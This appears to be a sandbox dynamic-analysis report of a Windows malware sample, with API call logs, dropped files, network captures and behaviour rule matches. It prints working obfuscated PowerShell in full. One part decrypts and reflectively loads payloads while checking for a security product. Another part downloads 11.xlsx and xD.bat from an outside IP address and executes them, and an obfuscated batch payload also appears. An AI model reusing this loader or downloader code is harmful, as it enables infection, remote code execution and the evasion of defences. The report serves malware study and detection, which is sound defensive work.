protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026dc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026fc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05030000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05031000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05032000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05033000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05034000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05035000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05036000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05037000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05038000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05039000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05040000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05041000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05042000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05043000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Roaming\11.xlsx
file C:\Users\test22\AppData\Roaming\~$11.xlsx
file C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\11.xlsx.LNK
file C:\Users\test22\AppData\Roaming\xD.bat
file C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\Roaming.LNK
Time & API Arguments Status Return Repeated

NtCreateFile

 create_disposition: 2 (FILE_CREATE)
file_handle: 0x00000438
filepath: C:\Users\test22\AppData\Roaming\~$11.xlsx
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Roaming\~$11.xlsx
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0

SetFileAttributesW

 file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\index.dat
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\index.dat
1 1 0

SetFileAttributesW

 file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\index.dat
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\index.dat
1 1 0
file C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\11.xlsx.LNK
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\Roaming.LNK
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Roaming\xD.bat';$wGtl='LowQGLawQGLdwQGL'.Replace('wQGL', ''),'ElfxQUemfxQUenfxQUtAfxQUtfxQU'.Replace('fxQU', ''),'FUtjArUtjAomUtjABasUtjAe6UtjA4UtjAStrUtjAingUtjA'.Replace('UtjA', ''),'GeOQGltOQGlCurOQGlrOQGleOQGlntOQGlPrOQGloOQGlcesOQGlsOQGl'.Replace('OQGl', ''),'EsWNTntsWNTryPsWNToisWNTntsWNT'.Replace('sWNT', ''),'MaieNXOnMoeNXOdueNXOleNXOeeNXO'.Replace('eNXO', ''),'TrOcAbansOcAbfoOcAbrmFOcAbiOcAbnaOcAblBOcAblocOcAbkOcAb'.Replace('OcAb', ''),'Splwhduiwhdutwhdu'.Replace('whdu', ''),'InPTvuvokPTvuePTvu'.Replace('PTvu', ''),'CreUFVYaUFVYteUFVYDUFVYecUFVYryUFVYptUFVYoUFVYrUFVY'.Replace('UFVY', ''),'CharscrngerscrErscrxrscrtrscrerscrnsirscrorscrnrscr'.Replace('rscr', ''),'DebAhhcobAhhmbAhhprbAhhebAhhssbAhh'.Replace('bAhh', ''),'CwGRRopwGRRyTwGRRowGRR'.Replace('wGRR', ''),'ReygHbadygHbLiygHbneygHbsygHb'.Replace('ygHb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($wGtl[3])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function kqXMT($FvMLi){$yuVsf=[System.Security.Cryptography.Aes]::Create();$yuVsf.Mode=[System.Security.Cryptography.CipherMode]::CBC;$yuVsf.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$yuVsf.Key=[System.Convert]::($wGtl[2])('ZPmarITq2qISishmMhAN5SieN3zSIyXHEEMkcAYPN4Y=');$yuVsf.IV=[System.Convert]::($wGtl[2])('pKL8KnX4ANOD8Ef8OdOJnQ==');$fXTHi=$yuVsf.($wGtl[9])();$KWagE=$fXTHi.($wGtl[6])($FvMLi,0,$FvMLi.Length);$fXTHi.Dispose();$yuVsf.Dispose();$KWagE;}function ymbNX($FvMLi){$BKlMi=New-Object System.IO.MemoryStream(,$FvMLi);$CmUjH=New-Object System.IO.MemoryStream;$xWgPw=New-Object System.IO.Compression.GZipStream($BKlMi,[IO.Compression.CompressionMode]::($wGtl[11]));$xWgPw.($wGtl[12])($CmUjH);$xWgPw.Dispose();$BKlMi.Dispose();$CmUjH.Dispose();$CmUjH.ToArray();}$pYGwG=[System.IO.File]::($wGtl[13])([Console]::Title);$BqtDQ=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 5).Substring(2))));$fdKjl=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 6).Substring(2))));[System.Reflection.Assembly]::($wGtl[0])([byte[]]$fdKjl).($wGtl[4]).($wGtl[8])($null,$null);[System.Reflection.Assembly]::($wGtl[0])([byte[]]$BqtDQ).($wGtl[4]).($wGtl[8])($null,$null); "
cmdline C:\Windows\system32\cmd.exe /K "C:\Users\test22\AppData\Roaming\xD.bat"
cmdline powershell.exe -ExecutionPolicy UnRestricted function lCfBYm($CxbstDZ, $hOVfNeFjMDKVb){[IO.File]::WriteAllBytes($CxbstDZ, $hOVfNeFjMDKVb)};function tegHetozGCLG($CxbstDZ){if($CxbstDZ.EndsWith((YHxkLPuDenWtsw @(45957,46011,46019,46019))) -eq $True){rundll32.exe $CxbstDZ }elseif($CxbstDZ.EndsWith((YHxkLPuDenWtsw @(45957,46023,46026,45960))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $CxbstDZ}elseif($CxbstDZ.EndsWith((YHxkLPuDenWtsw @(45957,46020,46026,46016))) -eq $True){misexec /qn /i $CxbstDZ}else{Start-Process $CxbstDZ}};function HVPZyUfwsXQUN($AOabLJYpXH){$zAoQSxGInPhmTj = New-Object (YHxkLPuDenWtsw @(45989,46012,46027,45957,45998,46012,46009,45978,46019,46016,46012,46021,46027));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hOVfNeFjMDKVb = $zAoQSxGInPhmTj.DownloadData($AOabLJYpXH);return $hOVfNeFjMDKVb};function YHxkLPuDenWtsw($gDqabOaTrBupDM){$LjTGjOQYKEN=45911;$zmPdEgNuruHTyO=$Null;foreach($IgfJnWcttwE in $gDqabOaTrBupDM){$zmPdEgNuruHTyO+=[char]($IgfJnWcttwE-$LjTGjOQYKEN)};return $zmPdEgNuruHTyO};function vbCETHtlMccKpmVgu(){$MREPVsahkPX = $env:AppData + '\';$alhWjToureJPvdZsBUe = $MREPVsahkPX + '11.xlsx';If(Test-Path -Path $alhWjToureJPvdZsBUe){Invoke-Item $alhWjToureJPvdZsBUe;}Else{ $GuMutFsCYQ = HVPZyUfwsXQUN (YHxkLPuDenWtsw @(46015,46027,46027,46023,45969,45958,45958,45960,45968,45962,45957,45961,45961,45961,45957,45968,45965,45957,45960,45961,45963,45969,45966,45961,45967,45966,45958,45960,45960,45957,46031,46019,46026,46031));lCfBYm $alhWjToureJPvdZsBUe $GuMutFsCYQ;Invoke-Item $alhWjToureJPvdZsBUe;};$hAnIYx = $MREPVsahkPX + 'xD.bat'; if (Test-Path -Path $hAnIYx){tegHetozGCLG $hAnIYx;}Else{ $KeXJYIz = HVPZyUfwsXQUN (YHxkLPuDenWtsw @(46015,46027,46027,46023,45969,45958,45958,45960,45968,45962,45957,45961,45961,45961,45957,45968,45965,45957,45960,45961,45963,45969,45966,45961,45967,45966,45958,46031,45979,45957,46009,46008,46027));lCfBYm $hAnIYx $KeXJYIz;tegHetozGCLG $hAnIYx;};;;;}vbCETHtlMccKpmVgu;
cmdline C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function lCfBYm($CxbstDZ, $hOVfNeFjMDKVb){[IO.File]::WriteAllBytes($CxbstDZ, $hOVfNeFjMDKVb)};function tegHetozGCLG($CxbstDZ){if($CxbstDZ.EndsWith((YHxkLPuDenWtsw @(45957,46011,46019,46019))) -eq $True){rundll32.exe $CxbstDZ }elseif($CxbstDZ.EndsWith((YHxkLPuDenWtsw @(45957,46023,46026,45960))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $CxbstDZ}elseif($CxbstDZ.EndsWith((YHxkLPuDenWtsw @(45957,46020,46026,46016))) -eq $True){misexec /qn /i $CxbstDZ}else{Start-Process $CxbstDZ}};function HVPZyUfwsXQUN($AOabLJYpXH){$zAoQSxGInPhmTj = New-Object (YHxkLPuDenWtsw @(45989,46012,46027,45957,45998,46012,46009,45978,46019,46016,46012,46021,46027));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hOVfNeFjMDKVb = $zAoQSxGInPhmTj.DownloadData($AOabLJYpXH);return $hOVfNeFjMDKVb};function YHxkLPuDenWtsw($gDqabOaTrBupDM){$LjTGjOQYKEN=45911;$zmPdEgNuruHTyO=$Null;foreach($IgfJnWcttwE in $gDqabOaTrBupDM){$zmPdEgNuruHTyO+=[char]($IgfJnWcttwE-$LjTGjOQYKEN)};return $zmPdEgNuruHTyO};function vbCETHtlMccKpmVgu(){$MREPVsahkPX = $env:AppData + '\';$alhWjToureJPvdZsBUe = $MREPVsahkPX + '11.xlsx';If(Test-Path -Path $alhWjToureJPvdZsBUe){Invoke-Item $alhWjToureJPvdZsBUe;}Else{ $GuMutFsCYQ = HVPZyUfwsXQUN (YHxkLPuDenWtsw @(46015,46027,46027,46023,45969,45958,45958,45960,45968,45962,45957,45961,45961,45961,45957,45968,45965,45957,45960,45961,45963,45969,45966,45961,45967,45966,45958,45960,45960,45957,46031,46019,46026,46031));lCfBYm $alhWjToureJPvdZsBUe $GuMutFsCYQ;Invoke-Item $alhWjToureJPvdZsBUe;};$hAnIYx = $MREPVsahkPX + 'xD.bat'; if (Test-Path -Path $hAnIYx){tegHetozGCLG $hAnIYx;}Else{ $KeXJYIz = HVPZyUfwsXQUN (YHxkLPuDenWtsw @(46015,46027,46027,46023,45969,45958,45958,45960,45968,45962,45957,45961,45961,45961,45957,45968,45965,45957,45960,45961,45963,45969,45966,45961,45967,45966,45958,46031,45979,45957,46009,46008,46027));lCfBYm $hAnIYx $KeXJYIz;tegHetozGCLG $hAnIYx;};;;;}vbCETHtlMccKpmVgu;
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: powershell.exe
parameters: -ExecutionPolicy UnRestricted function lCfBYm($CxbstDZ, $hOVfNeFjMDKVb){[IO.File]::WriteAllBytes($CxbstDZ, $hOVfNeFjMDKVb)};function tegHetozGCLG($CxbstDZ){if($CxbstDZ.EndsWith((YHxkLPuDenWtsw @(45957,46011,46019,46019))) -eq $True){rundll32.exe $CxbstDZ }elseif($CxbstDZ.EndsWith((YHxkLPuDenWtsw @(45957,46023,46026,45960))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $CxbstDZ}elseif($CxbstDZ.EndsWith((YHxkLPuDenWtsw @(45957,46020,46026,46016))) -eq $True){misexec /qn /i $CxbstDZ}else{Start-Process $CxbstDZ}};function HVPZyUfwsXQUN($AOabLJYpXH){$zAoQSxGInPhmTj = New-Object (YHxkLPuDenWtsw @(45989,46012,46027,45957,45998,46012,46009,45978,46019,46016,46012,46021,46027));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hOVfNeFjMDKVb = $zAoQSxGInPhmTj.DownloadData($AOabLJYpXH);return $hOVfNeFjMDKVb};function YHxkLPuDenWtsw($gDqabOaTrBupDM){$LjTGjOQYKEN=45911;$zmPdEgNuruHTyO=$Null;foreach($IgfJnWcttwE in $gDqabOaTrBupDM){$zmPdEgNuruHTyO+=[char]($IgfJnWcttwE-$LjTGjOQYKEN)};return $zmPdEgNuruHTyO};function vbCETHtlMccKpmVgu(){$MREPVsahkPX = $env:AppData + '\';$alhWjToureJPvdZsBUe = $MREPVsahkPX + '11.xlsx';If(Test-Path -Path $alhWjToureJPvdZsBUe){Invoke-Item $alhWjToureJPvdZsBUe;}Else{ $GuMutFsCYQ = HVPZyUfwsXQUN (YHxkLPuDenWtsw @(46015,46027,46027,46023,45969,45958,45958,45960,45968,45962,45957,45961,45961,45961,45957,45968,45965,45957,45960,45961,45963,45969,45966,45961,45967,45966,45958,45960,45960,45957,46031,46019,46026,46031));lCfBYm $alhWjToureJPvdZsBUe $GuMutFsCYQ;Invoke-Item $alhWjToureJPvdZsBUe;};$hAnIYx = $MREPVsahkPX + 'xD.bat'; if (Test-Path -Path $hAnIYx){tegHetozGCLG $hAnIYx;}Else{ $KeXJYIz = HVPZyUfwsXQUN (YHxkLPuDenWtsw @(46015,46027,46027,46023,45969,45958,45958,45960,45968,45962,45957,45961,45961,45961,45957,45968,45965,45957,45960,45961,45963,45969,45966,45961,45967,45966,45958,46031,45979,45957,46009,46008,46027));lCfBYm $hAnIYx $KeXJYIz;tegHetozGCLG $hAnIYx;};;;;}vbCETHtlMccKpmVgu;
filepath: powershell.exe
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2552
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef80000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received HTTP/1.1 200 OK
Data received Content-Length: 18710 Content-Type: application/octet-stream Connection:close PK!bîh^[Content_Types].xml ¢( ¬”ËNÃ0E÷HüCä-Jܲ@5í‚Ç*Q>Àēƪc[žiiÿž‰ûB¡j7±ÏÜ{2ñÍh²nm¶‚ˆÆ»R ‹ÈÀU^7/ÅÇì%¿’rZYï @1__f›˜q·ÃR4DáAJ¬h>€ãÚÇVßƹ ªZ¨9ÈÛÁàNVÞ8Ê©ÓãÑÔji){^óã-I‹"{Üv^¥P!XS)bR¹rú—K¾s(¸3Õ`cÞ0†½ÝÎß»¾7M4²©ŠôªZƐk+¿|\|z¿(Ž‹ôPúº6h_-[ž@!‚ÒØPk‹´­2nÏ}Ä?£LËð Ýû%áÄßdºždN"m,à¥ÇžDO97*‚~§Èɸ8ÀOíc|n¦ÑäEøÿöéºóÀBÉÀ!$}‡íàÈé;{ìÐå[ƒîñ–é2þÿÿPK!µU0#ôL _rels/.rels ¢( ¬’MOÃ0 †ïHü‡È÷ÕݐBKwAH»!T~€Iܵ£$Ý¿'TƒG½~üÊÛÝ<êÈ!öâ4¬‹;#¶w­†—úqu*&r–Fq¬áÄvÕõÕö™GJy(v½*«¸¨¡KÉß#FÓñD±Ï.W ¥†=™ZÆMYÞbø®ÕBSí­†°·7 ê“Ï›ז¦é ?ˆ9LìҙÈsbgÙ®|Èl!õùUSh9i°bžr:"y_dlÀóD›¿ý|-NœÈR"4ø2ÏGÇ% õZ´4ñ˝yÄ7 ëÈðɂ‹¨ÞÿÿPK!Ò§¬ÚúÒxl/workbook.xml¬UÛn£0}_iÿùb •Tm¥îªêõ%ÒʧXÌÚ¦IUõßwLJ¯/Ýv#âۘã33ÇÃáÑ®®¬[&MŒÈFkrQðæ&F— {‚,¥iSÐJ4,FwL¡£é÷o‡[!7+!64*F¥Ömä8*/YMՁhY–µ5Õ0•7Žj%£…*Óuå¸NMyƒö‘ü†X¯yÎ2‘w5kôD²Šj ¯JÞª­Î?WS¹éZ;u +^q}׃"«Î£ã›FHºªÀíñ­„'€?ÁиÃI`zwTÍs)”Xë€vö¤ßùO°CÈ«ìÞÇàcHž#Ù-79|b%ƒO² ž°‚g0‚¿ŒF@Z½V
Data received Content-Length: 66709 Content-Type: application/octet-stream Connection:close @echo off set "XYwABq=setocjVd ocjVduocjVdnSiocjVd=1 ocjVd&ocjVd& ocjVdstocjVdarocjVdt "ocjVd"ocjVd /mocjVdinocjVd ocjVd" set "aHbyse=&& ocjVdeocjVdxiocjVdtocjVd" set "YnfQeG=noocjVdtocjVd deocjVdfiocjVdnocjVdedocjVd uocjVdnSocjVdiocjVd if %YnfQeG:ocjVd=% (%XYwABq:ocjVd=%%0 %aHbyse:ocjVd=%) ::BeF5ow87uxWaOVsDX34hfHMzjY9LyYGJF8taUicqnOUHe1k+/C8bjfy7DRK1pgkPdtgP565bb9l1s/5bJA7EJV5U6XEOWyzY6nThjd5rAl67iErFaOrBOKOOvdUPLJj8yPws2zLhtzEujD588yBkMTMx9HC7KYAklXvPVSNdG4Ol54BuJusY/AB0kfUsR+J3koGkeRUT1m/s1AGQOaLusuZeFaFfqfOgHpgq7TWGba/B0JufgZ8a03iTDlDWnrdqh2GKb57hz7eEfEly+VXCXMdddlc9J45dLdABoTiyQ7tfKj+LXWZC52OxM+5SHVic+xXDN5nAoZvbK/WoU7y7u8SoviIS/X96YgW7R51EmhMNDPybjPit63dj4eQKo7jvhETMkWsBhp2sx6y5PKShUekyFY3WrjwAYffrkA1ZKo4qhj9rOXtHrlTCj7j+iU4uG3zFw44eGfmGvCOqUOe+iJYfFfouIEKHMg1ixaf87l4kXIlLMjjXoNn/0XJ/Tvt/eC77/MjMi9SAUg9Uvch+74mglxEvZU9GiucPSPzDflPSEhSVYj+OjkUob54YgRgL8HhhRHRlikAAyyPxSeJ18Md/asnK53hPVc49qolIY83tG3Fa2wXtEDSIitt8RQF2lWZj9HImAs0tVqmA9z+qMnbKbXy3WpYrVALWMakVYEiW7OwjVuO0Kqb7nqAtFR1MZfgeSVRWKzD5beSDoeJNUhVzs1eGAdJljUSuQnuWucaWBd9uoJcaLnGgfV0X4N9WQPwYjGd4naPDIIBYVcBweC0CoK10uOtSFiJzSqbEISWOAualyz/A6eGRHKkxaKl5F83Kp+Qillri9trdzPAGb/1ZNd54J4hbx7QR7tsfmN90wm+BevEvIzZkbF9ipwoMjAU0/BuB4PbSNely5xw5HFyyacehUXMDrtUAbDDjiwobB6dXeIO+eq1Rm6GfDNrjPcBRjphgjtQ2Qsvs1VG/3BDMIYSV4/H74I9rnWNkqo6QwwUh8bHzllBe4jhdKjthpI/OVi56Z8shqld6zR5Wt4eOYbm5I5DgS9IpwixY1Br1hQ4gyTRaYz6HDm1eo4sltb+EE9RGy2N/FfPPL7ysZD806HIwu7+uUkUUpZ5tJwAff1jVoGtkODQVN+QILsb3juCRaDB+TFoEHsJnEU8ITH19TURHoVvTOjLLn5xOhcU2etBUHlsHZ2klEydvXgRWL8yON4Oqz1CQdT+HirAYGaXn5fnWgNU09dXarADPEUOxcDVIuGWMg2p0/wgf+ANkBwdr0gCLjdlYUDpIUagoSl1jhs7FadaSS3QCJlPh4CDOePaN2gRMGEIUg3JBLnQcwSDfof61zglFwhS9jTs0fkiYuFDFEjL0dgCWNGNQG1yKdGXEEJ61RU3kqgiliOx6WjzbDggnVhbn+R4d0uExP990QRPusO5LR6Ev8aCyBSA/MjCuNayqaI843sPM52AEfQcDpmW3mlIO1A4ntSRwqL3sV7GRvd7DocYOUqDSxan9neGhuCtgrMuOus2VoqvRU7d0xyfqo5bs4SIW7qksuPW5DgQUJXm1bRTmn/kHDzJ0/4hWYV28Skzo8qT4wQcayI7I9iGl0jjYFrGiCgPQdMZx23/0Sesm4HQSpaIGOlUKBzR0/uP3jrPu0JlxkEZDairsQxmeFmpFOMx5j/vrwNgrL74iaFGGkynwqD2M2ivdpiR7Z8BgoKz8trnfXTo3H1IUB9KfnHjxFVN2CFHq/
Data sent GET /11.xlsx HTTP/1.1 Host: 193.222.96.124:7287 Connection: Keep-Alive
Data sent GET /xD.bat HTTP/1.1 Host: 193.222.96.124:7287
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Create a windows service rule Create_Service
description Communications over RAW Socket rule Network_TCP_Socket
description Communication using DGA rule Network_DGA
description Match Windows Http API call rule Str_Win32_Http_API
description Take ScreenShot rule ScreenShot
description Escalate priviledges rule Escalate_priviledges
description Steal credential rule local_credential_Steal
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Communications use DNS rule Network_DNS
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
